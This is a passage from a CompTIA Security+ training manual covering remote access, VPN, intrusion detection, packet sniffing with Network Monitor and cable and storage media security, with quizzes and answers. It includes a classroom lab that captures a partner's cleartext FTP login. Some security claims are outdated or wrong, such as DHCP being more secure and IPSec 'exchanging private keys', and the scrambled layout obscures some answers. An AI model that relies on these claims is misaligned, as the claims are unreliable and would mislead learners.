Wireless devices, while providing greater flexibility, mobility, and overall convenience, and have their own vulnerabilities when it comes to security. While network connections utilize the same TCP/IP protocol that wired LANs use, the wireless nature of the technology means that almost anyone can eavesdrop on a network communication; even if your wireless access point is protected by your firewall, you are still susceptible to having your unencrypted transmissions overheard. In addition, without proper access control, anyone can connect to the network. The only secure method of communicating with wireless technology is limiting access through MAC address filtering and providing confidentiality with encryption. Mobile devices Mobile devices, specifically Personal Digital Assistants (PDAs), can open security holes for any computer with which these devices communicate. A gap that is not covered by antivirus software or firewalls occurs during the PDA to PC synchronization process. View McAfees Web site to get more information about wireless security at
http://www.mcafee.com/myapps/vsw/default.asp. An example of a pocket

PC phone can be seen in Exhibit 9-6.

Exhibit 9-6: T-Mobile Pocket PC phone edition

922
Do it!

CompTIA Security+ Certification

D-1:

Reviewing telecom, cable, and wireless security

Questions and answers


1 What are two standard features found in todays cable modem hardware that protect customer files from being viewed or downloaded?
Basic network firewall and Data Over Cable Service Interface Specification (DOCSIS)

2 Failure to secure a PBX can result in toll fraud, theft of information, denial of service, and enhanced susceptibility to legal liability because of disclosure of supposedly secure information. True or false?
True

3 Explain the vulnerability involved in allowing the vendor to remotely manage the PBX system.
If a PBX is remotely managed, an intrusion into the system can happen without anyone actually gaining physical access to the PBX hardware.

4 Explain why allowing handsets to be attached and detached at will within a PBX system is considered risky.
Many of the move codes are standardized and posted on the Internet.

5 Why is DHCP considered more secure than static IP addressing?


Static IP addresses provide a fixed target for potential hackers; DHCP leases the IP address for a short time.

6 DHCP provides enhanced security for a computer by: A


B

Changing the MAC address of the computer on a random basis Changing the IP address of the computer on a random basis Tracking all keystrokes entered on the computer

7 What is the best method for ensuring confidentiality in wireless communications? A


B

Firewall Encryption Authentication Access control lists

C D

8 How is it possible to spread a virus from a PDA?


The virus can be downloaded to a PC during sync operations.

Network devices

923

Topic E: Securing remote access


This topic covers the following CompTIA Security+ exam objective:
# 3.1 Objective Understand security concerns and concepts of the following types of devices RAS (Remote Access Server) VPN

Remote access services


Explanation Permitting employees to remotely access the corporate network requires careful consideration and planning. Two commonly used measures for ensuring authentication and confidentiality are RAS and VPN. The Remote Access Service (RAS) provides the ability for one computer to dial into another computer via a standard modem. Once connected and authenticated, the remote user has the same access as if connected using a wired network connection. RAS servers typically have an array of modems and dial-in lines for remote connections. In addition to accepting incoming calls, most RAS servers also offer a feature called callback, which allows the server to disconnect an incoming RAS call and dial the callers number to reconnect. If the caller is not at the designated number, then no RAS connection is made. Callback is the most secure method for using RAS, though it will only work for fixed phone numbers such as telecommuting workers working from home. After users connect to the network through RAS, they have the same rights and privileges they have when they log on to a workstation that is physically wired to the network. RAS treats a modem as an extension of the network; RAS can use the same variety of protocols as a standard network interface card (NIC). RAS should be placed in the DMZ. It needs some protection, but generally should be considered insecure, and remote users should be forced to authenticate through an internal firewall prior to gaining full network access. One way to implement this is with a lock and key access method through the router. This is even available on low-end routers (such as Cisco 2600s). Security problems with RAS The RAS server is typically situated between the Internet and any physical firewall you might have in place, you should use a bastion host running only RAS and protected by application gateway software or firewall software. To further enhance security, use the encryption and mandatory callback features offered on RAS. In addition, if any unauthorized persons should gain access to the RAS server, they will still have to break through the firewall to get useful information.

924

CompTIA Security+ Certification

Virtual private networks


A Virtual Private Network (VPN) is used to provide a secure communication pathway or tunnel through such public networks as the Internet. An example of a typical VPN can be seen in Exhibit 9-7.

Exhibit 9-7: A typical VPN using Point of Presence (POP) When a virtual private network is implemented, the lowest levels of the TCP/IP protocol are implemented using an existing TCP/IP connection. The VPN hardware or software encrypts either the underlying data in a packet or the entire packet itself before wrapping it in another IP packet for delivery. Even if the packet is intercepted along the way, the content cannot be revealed to the hacker. Security is further enhanced by implementing Internet Protocol Security (IPSec). IPSec encryption IPSec was initially developed for Internet Protocol version 6 (IPv6), but many current IPv4 devices support it as well. It is the most commonly used encryption scheme for VPN tunnels. IPSec allows the encryption of either just the data in a packet or the packet as a whole including the address header information. These are called transport and tunnel, respectively. With IPSec in place, a VPN can virtually eliminate packet sniffing and identity spoofing. This is because only the sending and receiving computers hold the keys to encrypt and decrypt the packets being sent across the public network. The following steps show the process: 1 A remote user opens a VPN connection between his computer and his office network. The office network and the users computer (or their respective VPN gateways) execute a handshake and establish a secure connection by exchanging private keys. 2 The user then makes a request for a particular file.

Network devices

925

3 Assuming that the user has sufficient rights, the network begins to send the file to the user by first breaking the file into packets. If the VPN is using transport encryption, then the packets data is encrypted and the packets are sent on their way. If the system is using tunneling encryption, then each packet is encrypted and placed inside another IP envelope with a new address arranged for by the VPN gateways. 4 The packets are sent along the Internet until they are received at the users VPN device, where the encryption is removed and the file is rebuilt. If the VPN is using tunneling encryption, the peer VPN gateway forwards the unencrypted packets to the appropriate host on its LAN. Anyone sniffing the packets would have no idea of their content and might not even be able to determine the source and destination of the request. Do it!

E-1:

Securing remote access devices

Questions and answers


1 Describe the callback feature offered by RAS.
Callback allows the server to disconnect an incoming RAS call and dial the callers number to reconnect. If the caller is not at the designated number, then no RAS connection is made.

2 RAS treats a modem as an extension of the network. True or false?


True

3 If the RAS is placed in the DMZ, remote users should be forced to authenticate through an internal firewall prior to gaining full network access. True or false?
True

4 Which encryption method is commonly used for VPN tunneling? (Choose all that apply.)
A B

Transport IPSec CHAP EAP

C D

926

CompTIA Security+ Certification

Topic F: Intrusion detection systems


This topic covers the following CompTIA Security+ exam objective:
# 3.1 Objective Understand security concerns and concepts of the following types of devices IDS (Intrusion Detection System) Network Monitoring / Diagnostics

Host-based IDS
Explanation Intrusion detection systems (IDS) offer the ability to analyze data in real time to detect, log, and stop misuse or attacks as they occur. IDS solutions are available from a variety of vendors including Computer Associates, Inc., Cisco Systems Inc., NFR Security, SecureWorks, and many others. Systems come in the form of software called computerbased IDS and dedicated hardware devices called network-based IDS. Host-based IDS are often used to secure critical network servers or other systems containing sensitive information. In a typical implementation, software applications known as agents are loaded on each protected computer. These agents make use of the disk space, RAM, and CPU time to analyze the operating system, applications, and system audit trails. The collected information is compared to a set of rules to determine if a security breach has occurred. These agents are tailored to detect computer-related activity and can track these types of events at an extremely fine level, even down to tracking which user accessed which file at what time. Host-based agents can be self-contained, sending alarm information to the screen attached to the computer upon which they are installed or they might be remotely managed by a central software package that receives periodic updates and security data. A computer-based solution that includes a centralized management platform makes it easier to upgrade the software; however, these types of solutions do not scale well across a large enterprise given the number of computers involved.

Network-based IDS
Network-based IDS monitor activity on a specific network segment. Unlike host-based agents, network-based systems are usually dedicated platforms with two components: a sensor, which passively analyzes network traffic, and a management system, which allows security personnel to configure the sensors and provides alarms or feedback to the administrator. Implementations vary with some vendors selling separate sensor and management platforms and others selling self-contained sensor/management systems. An example of a Cisco IDS can be seen in Exhibit 9-8. The sensors in a network-based IDS capture network traffic in the monitored segment and perform rule-based or expert system analysis of the traffic using configured parameters. The sensors analyze packet headers to determine source and destination addresses in the same manner as a router. In addition, the sensors examine the type of data being transmitted and analyze the content of the packets flowing through them to determine if the packet is legitimate.

Network devices

927

If the sensor detects a packet that should not be in the system, it can perform a variety of tasks including sending an alarm to the management software or communicating with a router to have the router block all further packets from a particular address.

Exhibit 9-8: A Cisco network based IDS

Anomaly-based detection
Anomaly-based detection involves building statistical profiles of user activity and then reacting to any activity that falls outside these profiles. A users profile can contain attributes such as time spent logged on to the network, location of network access, files and servers accessed, and so forth. One problem with anomaly-based detection is that users do not access their computers or the network in static, predictable ways; employees are transferred to other departments, or they go on the road or work from home, changing their point of entry into the network. Anomaly-based intrusion detection often leads to a large number of false positives.

Discuss how anomaly detection systems are much like some of todays terrorist investigators who have been monitoring a group or an area for quite some time and are looking for any changes in standard activity or behavior, which might indicate that something is amiss

Signature-based detection
Signature-based detection is very similar to an antivirus program in its method of detecting potential attacks. Its currently the more popular method of detection. Vendors produce a list of signatures that the IDS use to compare against activity on the network or host. When a match is found, the IDS take some action, such as logging the event or sending an alarm to a management console. Although many vendors allow users to configure existing signatures and create new ones, for the most part, customers depend on vendors to provide the latest signatures to keep the IDS up to date with the latest attacks. Signature-based detection can also produce false positives, as certain normal network activity can be construed as malicious. For example, some network applications or operating systems might send out numerous ICMP messages, which a signature-based detection system might interpret as an attempt by an attacker to map out a network segment.

928
Do it!

CompTIA Security+ Certification

F-1:

Discussing IDS

Questions and answers


1 IDS offer the ability to analyze data in real time to detect, log, and stop misuse or attacks as they occur. True or false?
True

2 Compare the effectiveness of anomaly-based intrusion detection versus signaturebased detection.


Anomaly-based detection builds statistical profiles of user activities as a baseline for abuse. Users do not access their computers or network in static, predictable ways. The resources required for such a sensor is very large and costly, also, this method leads to a large number of false positives. Signature-based detection relies on a vendor-produced list of signatures to compare against activity on the network or host. This method can also produce a large number of false positives.

Network devices

929

Topic G: Network monitoring


This topic covers the following CompTIA Security+ exam objectives:
# 2.5 Objective Recognize and understand the administration of the following file transfer protocols and concepts Vulnerabilities Packet Sniffing 3.1 Understand security concerns and concepts of the following types of devices Network Monitoring / Diagnostics

Network monitoring and diagnostics


Explanation Network monitoring and diagnostics are essential steps in ensuring the safety and health of a network. Network monitoring is exactly what it sounds like, monitoring your network to ensure its reliability. Network monitoring and diagnostic tools can be either stand-alone or part of a network-monitoring platform such as HPs OpenView, IBMs Netview/AIX, Fidelias NetVigil, or Aprismas Spectrum. Microsoft Network Monitor Network Monitor is provided with Windows Server 2003 and offers basic network sniffing features, such as data collection, logging, fault analysis, and performance analysis. Its a good learning tool, but its limited to sniffing packets from the local NIC. Microsoft also offers an enhanced version of Network Monitor that can operate in promiscuous mode and sniff packets from any computer on the network. This product should be used on a production network and is packaged along with Microsoft Systems Management Server. Network monitor captures and displays a packet's source and destination address, the protocol used and data sent. If sent data is encrypted, its not readable in Network Monitor, that is, it's not displayed in plain text. All data sent to a monitored NIC is captured by Network Monitor by default. If you want to reduce the scope of what data is collected, you can apply a filter. Included with the full version of Network Monitor is the ability to identify Network Monitor users.

930
Do it!

CompTIA Security+ Certification

G-1:

Installing Microsoft Network Monitor Heres why

Heres how
Students should have a Windows Server 2003 installation CD-ROM available for this activity.

1 Boot to Server-X 2 Log on as Administrator 3 Click Start Choose Control Panel, Add
or Remove Programs To install Network Monitor.

4 Click Add/Remove
Windows Components
Make sure students don't check the check box.

5 Select Management and


Monitoring Tools

Click Details 6 Check the Network Monitor Tools box Click OK 7 Click Next Insert the Windows Server 2003, Standard Edition CD Click OK 8 Click Finish 9 Close the Add or Remove Programs window 10 Open a Command window Type ipconfig/all Press e 11 Write down the MAC address of the network card that is connected to the classroom network
At the command prompt. (If prompted.) To configure Network Monitor to operate on the appropriate NIC.

To continue the installation. To complete the installation.

Network devices 12 Click Start Choose Administrative Tools, Network Monitor


Youll receive a message as shown below.

931

13 Click OK 14 Expand Local Computer Select the appropriate NIC (the MAC address you wrote in Step 9)
The screen will resemble the one shown below.

15 Click OK Close all windows

932

CompTIA Security+ Certification

Using Microsoft Network monitor to sniff an FTP session


Explanation While Network Monitor is a very useful networking utility; it can also be used maliciously. As discussed previously, FTP and Telnet send-usernames and passwords in clear text. Other protocols that send passwords and data in clear text include HTTP, NNTP, IMAP, POP and SNMP. For FTP, Network Monitor can capture the entire FTP session and present the username and password to the potential hacker. One way to prevent this is to use only anonymous access for FTP sites. This does not enable you to lock down access to the server. You could also configure the FTP server to only allow certain IP addresses or use a VPN connection to limit the access to the appropriate users. A sniffer can be also be dangerous because it is very difficult to detect and can be attached to almost any part of a network.

Exhibit 9-9: Network Monitor capture of an FTP session

Network devices Do it!

933

G-2: Using Network Monitor to sniff an FTP session Heres how Heres why
Pair up with a partner for this activity. Each of your servers should have FTP services and Network Monitor installed.

Students should run this activity with a partner. Both servers should have the FTP server service and Network Monitor installed.

1 Access Computer Management

2 Expand Services and


Applications

3 Expand Internet
Information Services

4 Expand FTP Sites 5 Ensure that the Default FTP Site is started 6 Click Start Choose Administrative Tools, Network Monitor 7 On the menu bar, choose Capture, Start 8 Open a Command window 9 Type ftp <your partners IP
address> You might also use the IP address of your own server. Start the Default FTP Site if it's stopped.

10 Enter Administrator for the user Enter password for the password 11 Once you are logged on, enter
quit

12 Switch back to the Network Monitor Choose Capture, Stop Click View
Information displayed will be similar to that shown in Exhibit 9-9.

13 Close all windows

Do not save the capture.

934
Do it!

CompTIA Security+ Certification

G-3:

Reviewing Network Monitor

Questions and answers


1 Network Monitor captures and displays which of the following? (Choose all that apply.) A B C D
E

Source address Destination address Protocol Data All of the above

2 Which of the following security features is available for the full version of Network Monitor?
A

Identify Network Monitor Users Intrusion detection system add-on Packet modification tools Password Sniffing tools

B C D

3 Network Monitor will allow you to view encrypted data in plain text. True or false?
False: Encrypted data is unreadable.

4 Which of the following protocols sends passwords and data in clear text? (Choose all that apply.) A B C D E F G
H

Telnet FTP HTTP NNTP IMAP POP SNMP All of the above

5 Network Monitor will capture all data sent to your NIC by default. What can be used to narrow the scope of the data collected? A B
C

A NIC in promiscuous mode A screen A filter A strainer

Network devices 6 Network Monitor is considered a sniffer. Which of the following is a characteristic of a sniffer? A B C
D

935

Logging Fault analysis Performance analysis All of the above

7 A sniffer can be dangerous because it is very difficult to detect and can be attached to almost any part of a network. True or false?
True

936

CompTIA Security+ Certification

Unit summary: Network devices


Topic A In this topic, you learned that a firewall creates a virtual barrier between an internal and external network. It accomplishes this through network address translation, packet filtering, stateful packet inspection, application gateways, and access control lists. You also learned that the steps involved in drafting a security policy include determining what devices require protection, identifying the potential threats, disabling non-essential services, and identifying who requires access to the network and who will administer it. In this topic, you learned how routers and gateways are used within the networking environment and how to safeguard their security. You learned about the various servers found in the demilitarized zone, including bastion hosts, honey pots, and application gateways. You also examined the Open Systems Interconnection (OSI) stack and how it applies to packet filtering on the router. In this topic, you learned the steps to take to secure a switch. You identified the vulnerabilities intrinsic in switches and how they can be overcome using virtual local area networks (VLANs), Secure Shell (SSH), and installation behind a firewall. In this topic, you learned how to protect Private Branch Exchange (PBX), modems, and wireless devices against intrusion. You learned that these are often overlooked when developing a security policy and require special diligence to overcome their vulnerabilities. In this topic, you learned how to secure remote access connections using Virtual Private Networks (VPNs) and Remote Access Service (RAS) technologies. In this topic, you studied the Intrusion Detection System (IDS). You learned that the IDS offers the ability to analyze data in real time to detect, log, and stop misuse or attacks as they occur. You also learned about the various types of Intrusion Detection Systems. In this topic, you learned about the characteristics of network sniffers and how to use Microsoft Network Monitor to monitor traffic on the network.

Topic B

Topic C

Topic D

Topic E Topic F

Topic G

Review questions
1 What is a firewall?
A hardware or software barrier that isolates one network from another.

2 Answering the following questions provides you with what? What is being protected, from whom is it being protected, what services does the company need to access over the network, who gets access to which resources, and who administers the network.
You can draft a robust security policy, by answering those questions.

3 What do firewalls protect against?


Firewalls effectively protect against malicious packets from the outside and unauthorized Internet access from within the company.

4 List the techniques typically used by firewalls to protect networks.


NAT, packet filtering, SPI, and ACL

Network devices 5 PAT is a subset of NAT. True or False?


True

937

6 What is a router?
A network management device that sits between different network segments and routes traffic from one network to another.

7 A DMZ is used for servers on a battlefield. True or False?


False: DMZ in network terms is the area that a company sets aside for servers that are publicly accessible or have lower security requirements than other internal servers.

8 What is a bastion host?


A computer that resides in a DMZ and hosts Web, mail, DNS, and/or FTP services.

9 What is another name for an application gateway?


Proxy server

10 List the layers of the OSI model.


1 Physical 2 Data Link 3 Network 4 Transport 5 Session 6 Presentation 7 Application

11 Which devices work at layer 1 of the OSI model? A Bridge B Switch


C D

Repeater Hub

12 Which Layer 2 device can limit the functionality of sniffing? A A bridge B A hub
C A switch

D A router 13 Why should you configure a switch using a physical connection to it?
If you use Telnet or HTTP protocols to access the switch remotely, these are both open text protocols that can be intercepted leading to compromising of the security of the switch configuration.

14 What feature is used for cable network security that provides authentication and packet filtering?
DOCSIS

938

CompTIA Security+ Certification 15 What steps can you take to make RAS connections more secure?
Use a bastion host running only RAS and protected by application gateway software or firewall software. To further enhance security, use the encryption and mandatory callback features offered on RAS. In addition, if any unauthorized persons should gain access to the RAS server, they will still have to break through the firewall to get useful information

16 VPN tunnels typically use IPSec encryption. True or False?


True

17 Intrusion detection systems (IDS) offer the ability to analyze data in real time to detect, log, and stop misuse or attacks as they occur. True or False?
True

18 Host-based IDS systems are usually dedicated platforms with two components: a sensor, which passively analyzes network traffic, and a management system, which allows security personnel to configure the sensors and provides alarms or feedback to the administrator. True or False?
False: This is a description of a network-based IDS.

19 How does anomaly-based detection work?


Anomaly-based detection involves building statistical profiles of user activity and then reacting to any activity that falls outside these profiles.

Independent practice activity


In this exercise, you test your computer for Internet Security. You must have an Internet connection to begin this exercise. 1 At your server, go to the Gibson Research Corporation Web site:
http://grc.com/default.htm.

2 Click on the ShieldsUp! link. You might have to scroll down to see the link. 3 On the resulting Shields Up! page, scroll down midway and click on the Proceed button. Click Yes. 4 Click on the File Sharing button. 5 Your computer system will be tested for file system security. If you have a printer available, print the results of the test noting any system vulnerabilities. 6 Scroll down the page and click on the Common Ports button. 7 Your computer system will be tested for security related to ports that are commonly used. If you have a printer available, print the results of the test noting any system vulnerabilities. 8 Repeat the process of checking your computer by clicking on the All Service Ports, Messenger Spam and Browser Headers buttons respectively after each previous test has completed. 9 When you've completed all tests, return to the GRC Web site at http://grc.com/default.htm and again click on the ShieldsUp! link. 10 Close all open windows.

101

Unit 10 Transmission and storage media


Unit time: 60 minutes Complete this unit, and youll know how to:
A Identify the various types of transmission

media and describe how to physically protect the media.


B Identify the various types of storage media

and discuss ways to mitigate the risk of catastrophic data loss.

102

CompTIA Security+ Certification

Topic A: Transmission media


This topic covers the following CompTIA Security+ exam objective:
# 3.2 Objective Understand the security concerns for the following types of media Coaxial Cable UTP / STP (Unshielded Twisted Pair / Shielded Twisted Pair) Fiber Optic Cable

Types of transmission media


Explanation At the core of internetworking technology is the Open Systems Interconnect (OSI) model. The first layer (Physical layer) of the model deals with the transmission media, which includes: Coaxial cable Twisted pair copper cable (shielded and unshielded twisted pair) Fiber-optic cable Wireless connections

Coaxial cable
Coaxial cable has a single wire conductor surrounded by an insulating material, which in turn is surrounded by a braided metal shield (see Exhibit 10-1). Coaxial cable tends to be more expensive than traditional telephone wiring, but is much less prone to interference. Vulnerabilities include cable breaks and malicious tapping. There are actually three types of coaxial cable used in networking: RG-8 RG-58 RG-59

Exhibit 10-1: Coaxial cable

Transmission and storage media RG-8

103

RG-8, also referred to as 10Base5 or ThickNet, is the oldest form of coaxial cable. It uses baseband (single channel) signaling and 50-Ohm terminators. It is primarily used as a backbone in an Ethernet LAN environment and often connects one wiring closet to another. It can transmit data at speeds up to 10 Mbps, cover distances up to 500 meters, and can accommodate up to 100 nodes per segment. Up to five segments can be daisychained. Due to its rigidity, it is difficult to work with. RG-58 RG-58, also called 10Base2 or Thinnet (thin coaxial cable), uses baseband signaling and 50-Ohm terminators. It is the more popular form of coaxial cabling for Ethernet networks. Thinnet is capable of covering up to 185 meters and is not highly susceptible to noise interference. It transmits at 10 Mbps and can support up to 30 nodes per segment. Up to five segments can be daisy-chained. RG-59 RG-59 is the familiar coax cable used for cable TV and cable modems. It is rated 75 Ohms and offers broadband (multiple channels) transmission. RG-59 is able to transport both analog and high-speed digital signals, allowing for data, voice, and video capabilities. Note: It is important to know that 50-ohm and 75-ohm cabling are not interchangeable.

Twisted pair cable


Twisted pair cable is a popular wiring type for LANs. Individual wires are twisted together to prevent cross talk between pairs and to reduce the effects of electromagnetic interference (EMI) and radio frequency interference (RFI). EMI is interference in signal transmission or reception and is caused by the radiation of electrical or magnetic fields, which are present near power cables, heavy machinery, or fluorescent lighting. Twisting the copper wires together and wrapping them in a plastic outer casing can lessen this type of interference. It is a very inexpensive alternative to coaxial cable, but cannot support the same distances. Twisted pair copper cable has long been used by telephone companies, and most buildings in North America are pre-wired with one version of it, unshielded twisted pair (UTP). An example is shown in Exhibit 10-2.

Exhibit 10-2: Unshielded twisted pair cable

104

CompTIA Security+ Certification The difference between UTP and shielded twisted pair (STP) is an extra foil shield that is wrapped between the copper pairs to provide additional protection from EMI (Exhibit 10-3).

Exhibit 10-3: Shielded twisted pair cable Twisted pair is further classified into different categories based on the data transmission rates it can sustain. The most common types of cables are Category 3 (CAT 3), Category 5 (CAT 5), and most recently Category 6 (CAT 6). CAT 3 is the minimum requirement for 10Mbps Ethernet and voice systems. CAT 5 is required to support Fast Ethernet (100Mbps) and uses an 8-pin configuration that can be modified for use as a crossover cable, a straightthrough cable, or a customized cable. CAT 5E is a higher grade CAT5 cable. CAT 6 is a newer technology that is capable of supporting Gigabit Ethernet (1000 Mbps) and is backwards compatible and also uses an 8-pin configuration. Twisted pair connects to hardware using an RJ-45 connector, which looks very similar to a phone jack, but is a bit larger (Exhibit 10-4).

Exhibit 10-4: RJ-45 connector Note: It is important to know that twisted pair is very easily spliced, which allows unauthorized users access to the network. A discussion of these types of problems follows later in the unit.

Transmission and storage media

105

Fiber-optic cable
Fiber-optic cable is the newest form of cable available. It comprises a glass core that is encased by a plastic outer covering. It is also much smaller, lighter, more fragile, and susceptible to damage than coaxial cable or twisted pair (Exhibit 10-5).

Exhibit 10-5: Fiber-optic cable Instead of an electrical current (like coaxial and twisted pair), fiber-optic cable carries light. It is capable of transmitting more data much further than other wiring types and is immune to the effects of EMI. Perhaps the biggest benefit of using fiber-optic cable is that it is nearly impossible to splice without detection. In order to effectively split a fiber-optic signal, the core must be disrupted, thus allowing for ease of detection by a network administrator. The biggest disadvantages to fiber are its cost and its difficulty to install and manipulate. The table below provides a comparison of the three types of wired transmission media just discussed.
Media Coaxial cable Advantages High bandwidth, long distances, relative EMI immunity Disadvantages Physical dimensions (can be bulky and difficult to work with), easily tapped, single cable break brings the network down Most sensitive to EMI, supports short distances, easily tapped

Twisted pair copper cable

Inexpensive, widely used, easy to add nodes, single cable break wont bring the network down Very high bandwidth, EMI immunity, long distances

Fiber-optic cable

Most expensive, difficult to implement

Wireless
Unguided transmissions of data use various technologies including microwave, radio, and infrared to receive and transmit over airwaves. Wireless was previously discussed at length, yet it is important to realize that it too is a form of transmission media and should be considered when thinking about implementing and securing networks. Much like coaxial cable and twisted pair copper cable, unguided transmission methods are vulnerable to security breaches in which unauthorized users intercept data flows. The most important distinction is that because unguided connections cannot easily be physically contained like the media, it is much more difficult to secure.

106
Do it!

CompTIA Security+ Certification

A-1:

Discussing transmission media

Questions and answers


1 Thinnet can transmit data at speeds up to __________. A B
C

100 Mbps 50 Mbps 10 Mbps 5 Mbps

2 A(n) __________ is a standardized connector used to connect twisted pair copper cable to a piece of networking equipment. A
B

DL-17 RJ-45 RJ-54 RJ-11 LD-71

C D E

3 Fiber-optic cable is comprised of a __________ core. A B C


D

plastic copper gold glass

4 Fiber-optic cable uses __________ to transmit data. A B


C

EMI electrical current light vibrations

5 __________ is the most secure of the physical transmission media. A B


C

Coaxial cable Twisted pair copper cable Fiber-optic cable

6 __________ is the most inexpensive transmission media. A


B

Coaxial cable Twisted pair copper cable Fiber-optic cable

Transmission and storage media

107

7 Twisted-pair cable is the most widely known by the general public because it is the primary type of cabling used for cable television. True or false?
False. Coaxial cable is used for cable television.

8 CAT 3 is the minimum requirement for 10 Mbps Ethernet and voice systems. True or false?
True

9 CAT 5 is required to support Fast Ethernet (100 Mbps). True or false?


True

108

CompTIA Security+ Certification

Securing transmission media


Explanation Many unauthorized users intend to harm an organization by accessing the network infrastructure. To counteract this type of activity, the implementation of an extremely secure infrastructure can be very expensive, yet cutting corners when securing transmission media can make an organization an easy target. A balanced approach must be followed when making security decisions. The most vulnerable aspect of a network is the data flow. Network infrastructures may be very complex and span significant geographic distances. These interdependent pieces of the network can be easily compromised when a wire or cable is tapped or spliced. Common attacks include interception and interruption of traffic: Interception of traffic usually involves the tampering of physical media as it crosses non-secure areas. For example, coaxial cable or twisted pair is sometimes used to connect separate floors in an office building. The space between floors may be unsecured by the company or organization and accessible by potential attackers using a simple splice of the cable. Interruption of traffic is caused by rendering network access devices inoperable. This can happen when a potential attacker has access to a wiring closet or LAN closet. Damage to networking equipment is easy to accomplish once access is gained. Attacks that are more difficult involve unauthorized eavesdropping or sniffing of network traffic because it typically requires physical access. If the network is compromised in such a way that this can occur, most of the work to attack the integrity of a network has already been done. Common scenarios include: Inserting a node that has the ability to intercept network traffic using a sniffer or some other packet analyzer. Modifying switch or router configurations to bypass network security devices such as firewalls. Resetting an interior node so that its data flows are exported to an external path. War driving, a common problem with wireless transmissions. Altering data flows on the network compromises the integrity of the network. Potential damage can include the corruption of data, sabotage of core business plans, and impersonation of corporate nodes to gain even further access. This can be accomplished by cracking passwords obtained using a sniffer. Physical security Network devices are usually easy targets because most organizations do not have a permanent person on duty to protect the equipment in its physical location. A locked door on a wiring closet is not enough if that space is shared with phone companies or other external vendors. If the space is shared, enclosed racks that can be locked should be purchased. Only authorized employees who need access to the network equipment are given a key. Another added layer of security in this instance is to install closed circuit security cameras that are monitored as part of the standard security of the building. In a large Web complex or data center, raised floors are a great place for attackers to hide devices that are tapped into the network. There are floor tiles available that you can fasten to the floor to provide another layer of security. It is also a good idea to monitor the floor area with regular inspections looking for unauthorized equipment.

Transmission and storage media

109

It is extremely difficult to ensure the security of physical cabling. Both coaxial cable and twisted pair are easily spliced. The most vulnerable places for gaining unauthorized access to cabling are between buildings or floors. Sometimes, the distance between the points is large enough to require fiber-optic cable, which gives the added benefit of more security. However, the majority of interfloor connections still use some form of copper wire, which makes the physical security of that connection all the more important. Electromagnetic emissions Despite all of the physical security that can be implemented, it is still possible for attackers to eavesdrop on data flows by listening for electromagnetic emissions from workstations and other nodes. There are several ways to protect against this. If possible, purchase and use equipment that is designed to limit or eliminate the signal leaks. This can be very expensive. Fiber-optic cable is especially good at eliminating this type of risk. Another way to stop eavesdropping through electromagnetic emission is to encrypt the data flows using various different encryption technologies. This way, even if an attacker has access to the flows, the data is useless without a key to decrypt the data. Power interruptions In many situations, LAN and wiring closets tend to share spaces with power sources and other utilities. This exposes the network to a failure risk even without a threat of an attacker. Should there be a fire, the network can be showered with water or other fire retardants. Several dry methods for fire extinguishing can be used and should be investigated when securing a network. Many LANs are also completely reliant on a power supplier for all the power to the network. Deploying an uninterruptible power supply (UPS) can mitigate this risk by providing temporary power during a brief outage. Interruption of services Another way to secure the infrastructure is to implement a redundant network (having multiple devices in the same function). In this instance, if a network device becomes compromised, it does not necessarily mean that the entire network is compromised. A backup device can be available to take over the duties of the disabled piece of equipment. War driving The media has covered many cases of war driving. Literally, war driving is using a laptops wireless network interface card set in promiscuous mode to pick up unsecured wireless signals. Today, hackers are war driving, or LAN-jacking, wireless networks for anonymous and free high-speed Internet access or purely for access to a network. War driving requires no elaborate software or hardware. An ordinary wireless NIC set in promiscuous mode easily latches on to open wireless network beacons. Using a global positioning satellite (GPS) receiver in conjunction with wireless network interface cards, hackers are mapping major metropolitan areas and compiling a list of wireless networks, both secured and unsecured. One of the best ways to defend against such attacks is to use a VPN or other encryption technology when using wireless LANs.

1010 CompTIA Security+ Certification


Thorough attention to the security of the infrastructure is one of the least expensive means of preventing successful compromises of the system. While stronger security appliances and extensive infrastructure choices help make more secure networks, careful design and implementation is necessary. Mapping out cabling and deploying fiber optics in unsecured areas can help mitigate the risk of eavesdropping. Do it!

A-2:

Securing transmission media

Questions and answers


1 A(n) __________ can mitigate the risk of power outages and network downtime. A
B

surge protector UPS EMI ACL

C D

2 What is the most likely area for an intruder to try to gain access to physical network media?
A non-secure area, such as the space between floors where coaxial or twisted pair media may be connecting separate floors in an office building.

3 What are some of the ways you can minimize eavesdropping of electromagnetic emissions?
Use fiber optic cable and/or encrypt data.

4 What is another term for war driving?


LAN-jacking

Transmission and storage media

1011

Topic B: Storage media


This topic covers the following CompTIA Security+ exam objective:
# 3.2 Objective Understand the security concerns for the following types of media Removable media Tape CD-R (Recordable Compact Disks) Hard Drives Diskettes Flashcards Smartcards

Fixed and removable storage media


Explanation Computer users are constantly creating and transporting files that need to be stored and used later. Storage media provides a way to hold data at rest. Perhaps the most common type of storage media is a hard disk drive. Every computer has a permanent hard drive as part of its hardware configuration. The hard drive can store a multitude of information, from operating systems to software to personal files. Hard disk drives were developed by IBM in the 1970s and are ubiquitous today. Removable storage media has been around nearly as long as the computer itself and goes back to the times of the punch card. Advancements in computer technology brought about magnetic storage devices that are much more efficient and can store much larger amounts of data. Today there are three major types of storage media: magnetic, optical, and solid-state.

1012 CompTIA Security+ Certification Magnetic storage media


Magnetic storage media is coated with some form of iron oxide. When data is recorded to the media, an electromagnet inside the disk drive rearranges the iron oxide particles into a series of patterns that represent 0s and 1s. These patterns can be readily identified later. When the data is retrieved, the reading disk drive uses a magnetic field to read what the pattern is. This pattern is then translated into data that is sent to the computer in binary form. The most prominent forms of magnetic storage media in use today are shown in Exhibit 10-6.

Exhibit 10-6: Various storage media Floppy disks The first floppy disks were not rigid or encased in hard plastic as they are today. The size of the floppy has changed several timesthe original floppy disk measured 8 inches across. A 5.25-inch disk was then developed, and finally the 3.5-inch disk that is now commonly used. Other types of floppy disks also exist, but the most common is the 3.5-inch, high density, which holds about 1.44 MB of data. The 3.5-inch floppy disk has a circular magnetic piece of plastic, which is placed inside a rigid plastic case for protection. To help avoid data loss, carrying disks in a waterproof case helps prevent water or dust from damaging the disk. Keep floppy disks away from anything that might hold a magnetic or electrical field, such as a mobile phone, radio, metal tools or paper clips that have been stored in a magnetic paper clip holder. Because floppy disks are made of magnetic material, any other magnetic material can erase or damage data on the floppy disk. Store floppy disks in an area with a temperature between 32 and 140 F. Although the floppy disk was once the primary type of magnetic removable media, it is quickly being replaced by larger-capacity magnetic disks. Cartridge disks Cartridge drives were popular in the 1990s. They gave users more capacity than the 1.44 MB floppy disks had. Users were comfortable with removable disk storagethey had been using the floppy disks. Removable disk storage has changed a lot over the years from the basic floppy disk to the Bernoulli box to the REV drive. Popularity of cartridge drives has declined with the rise in availability of CD and DVD recordable media and 